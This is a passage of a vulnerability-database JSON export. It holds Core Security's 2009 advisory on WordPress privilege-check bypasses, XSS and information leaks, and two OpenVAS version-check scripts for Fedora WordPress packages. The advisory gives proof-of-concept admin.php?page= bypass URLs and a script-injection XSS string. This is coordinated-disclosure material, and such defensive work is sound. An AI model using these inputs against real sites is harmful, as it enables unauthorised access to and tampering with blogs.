plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\r\nTPRpR0Gn0WqmF8HOeDslbA8=\r\n=zEDK\r\n-----END PGP SIGNATURE-----\r\n\r\n# sebug.net\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14855", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:44:34", "description": "No description provided by source.", "published": "2009-07-09T00:00:00", "type": "seebug", "title": "WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11777", "id": "SSV:11777", "sourceData": "\n WordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Pr \\\r\nivileges_Unchecked Date published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/opt \\\r\n ions.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways- \\\r\n to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/optio \\\r\n ns.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode( \\\r\n83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php \\\r\n \r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11777", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2018-04-06T11:39:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064407", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064407", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-7729 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7729.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7729 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7729\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64407\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-7729 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064697", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064697", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8529.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8529 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page= bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8529\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64697\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:27", "bulletinFamily": 